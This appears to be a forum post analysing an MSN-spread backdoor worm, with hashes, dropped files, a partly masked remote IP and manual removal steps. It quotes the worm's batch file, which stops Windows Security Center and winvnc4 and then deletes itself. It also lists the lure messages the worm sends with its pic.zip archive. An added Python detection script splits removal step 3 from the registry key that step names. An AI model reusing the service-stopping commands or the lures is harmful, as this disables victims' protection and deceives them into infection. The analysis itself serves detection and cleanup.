The MSN worm has been updated again??.....
As of the 2nd, Dr.Web, AVG, Rising, Kingsoft, Norton, McAfee, Jiangmin and the rest all fail to detect it.
File name: IMG34814.pif
File size: 141824 bytes
AV name: Trojan.Win32.Delf.ads (Kaspersky)
Packer: none
Written in: Borland Delphi 6.0 - 7.0
Malware type: backdoor
File MD5: ef2e009208e0efef05d149ee06388dd3
File SHA1: 45E43FB7BD4EB62D524927F5BE71240A74C9BB6B
Spread via: MSN.
Behaviour analysis:
1. Drops the malware files:
%Windir%\msnmsg.exe 41824 bytes
%Windir%\pic.zip 141946 bytes
(zip archive)
%Windir% is C:\Winnt (2000, ME) or C:\Windows (XP, 2003)
2. Drops a batch file: c:\a.bat
Contents:
@echo off
net stop "Security Center"
net stop winvnc4
del c:\a.bat
It launches CMD and calls Net Stop to try to disable the following services:
Security Center (the Windows Security Center) and winvnc4 (remote control)
SSM log:
Parent process:
Path: C:\WINNT\system32\CMD.EXE
PID: 1580
Information: Windows NT Command Processor (Microsoft Corporation)
Child process:
Path: C:\WINNT\system32\net.exe
Information: Net Command (Microsoft Corporation)
Command line:"C:\winnt\system32\net.exe" stop "Security Center"
Parent process:
Path: C:\WINNT\system32\CMD.EXE
PID: 1580
Information: Windows NT Command Processor (Microsoft Corporation)
Child process:
Path: C:\WINNT\system32\net.exe
Information: Net Command (Microsoft Corporation)
Command line:net stop winvnc4
3. Tries to launch msnmsgr.exe without any checks
Log:
Parent process:
Path: C:\WINNT\system32\svchost.exe
PID: 404
Information: Generic Host Process for Win32 Services (Microsoft Corporation)
Child process:
Path: C:\Program Files\MSN Messenger\msnmsgr.exe
Information: MSN Messenger (Microsoft Corporation)
Command line:"C:\Program Files\MSN Messenger\msnmsgr.exe" -Embedding
4. The fake msnmsgr.exe (C:\Windows\msnmsgr.exe) stays resident, connects to 213.232.92.1**, and opens port 1863.
(Wow, very convincing; going by the IP it is probably an IRC server in the UK, but no other behaviour was observed)
5. Watches for MSN chat windows and randomly sends one of the following messages together with the pic.zip archive:
Hey :-), I just took this picture, sexy isnt it :-P?
What do you think of my photo editing skills?
Which one do you like in this pic, the black one or the blue one?
This is what happens when you eat to many chips :-P
Look what i made out of cans!! haah :-P!
:-p this was halarious at that party a while back
Hey I have a new pic, what do ya think?
Check this out this pic is so freaking cool
Hahahaha, do you remember this picture?
:-O Check this out! Nearly laughed my ass off!!
hey wats up.. have you seen this pic of harry potter?
(unconfirmed)
Removal:
First try the MSN worm removal tool and see whether it can clean it~~
Manual removal:
Download SREng
http://www.kztechs.com/sreng/download.html
1. Disconnect from the network and close any processes you don't need.
2. Open Task Manager and end the msnmsgr.exe process (end every instance you find``)
3. Open SREng and delete:
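A detection-side example, added here and not part of the post, that parses the SSM-style parent/child log layout quoted above and flags the two behaviours from steps 2 and 4: cmd.exe spawning net.exe to stop Security Center or winvnc4, and an MSN-named binary running from outside the real MSN Messenger directory. The sample log is constructed; the explorer.exe-parented launch of the dropped msnmsg.exe is an assumption.

```python
import ntpath

# Constructed SSM-style log in the layout quoted in the post: event 1 mirrors
# the post's "net stop" event; event 2 is an assumed logon-time launch of the
# dropped msnmsg.exe from the Run key, parented by explorer.exe.
SAMPLE_LOG = r"""Parent process:
Path: C:\WINNT\system32\CMD.EXE
PID: 1580
Child process:
Path: C:\WINNT\system32\net.exe
Command line:"C:\winnt\system32\net.exe" stop "Security Center"
Parent process:
Path: C:\WINNT\explorer.exe
Child process:
Path: C:\WINNT\msnmsg.exe
Command line:C:\WINNT\msnmsg.exe
"""
TARGET_SERVICES = {"security center", "winvnc4"}  # services a.bat stops
MSN_NAMES = {"msnmsg.exe", "msnmsgr.exe"}         # dropped / impersonated names
REAL_MSN_DIR = r"c:\program files\msn messenger"  # where the real client lives

def parse_events(text):
    """Split an SSM log into {'parent': {...}, 'child': {...}} dicts."""
    events, side = [], None
    for line in text.splitlines():
        if line.startswith("Parent process:"):
            events.append({"parent": {}, "child": {}})
            side = "parent"
        elif line.startswith("Child process:"):
            side = "child"
        elif events and ":" in line:
            key, _, val = line.partition(":")
            events[-1][side][key.strip().lower()] = val.strip()
    return events

def flag_event(ev):
    """Return the reasons an event matches the behaviour described above."""
    parent = ev["parent"].get("path", "").lower()
    child = ev["child"].get("path", "").lower()
    cmd = ev["child"].get("command line", "").lower()
    reasons = []
    # a.bat behaviour: cmd.exe spawning net.exe to stop Security Center / winvnc4
    if ntpath.basename(child) == "net.exe" and ntpath.basename(parent) == "cmd.exe":
        svc = cmd.partition(" stop ")[2].strip().strip('"')
        if svc in TARGET_SERVICES:
            reasons.append("net stop of protected service: " + svc)
    # an MSN-named binary running from outside the real install directory
    if ntpath.basename(child) in MSN_NAMES and ntpath.dirname(child) != REAL_MSN_DIR:
        reasons.append("MSN-named binary outside its install directory: " + child)
    return reasons
```

Run `flag_event` over `parse_events(SAMPLE_LOG)`; the genuine client launched from C:\Program Files\MSN Messenger produces no reasons.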
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<Microsoft Genuine Logon><msnmsg.exe> []
4. Delete:
%Windir%\msnmsg.exe 41824 bytes (mind the path)
%Windir%\pic.zip 141946 bytes (zip archive)
%Windir% is C:\Winnt (2000, ME) or C:\Windows (XP, 2003)
PS: If the msnmsgr.exe process can't be ended, ignore it; clean the registry first, reboot, and then delete msnmsg.exe.
孤独's ad:
If the above method doesn't remove it, or your symptoms don't match, contact Q526170722
No remote disinfection requests!
``Ideally, provide a sample```
No discussion of techniques or removal methods either
(I no longer research anti-virus techniques)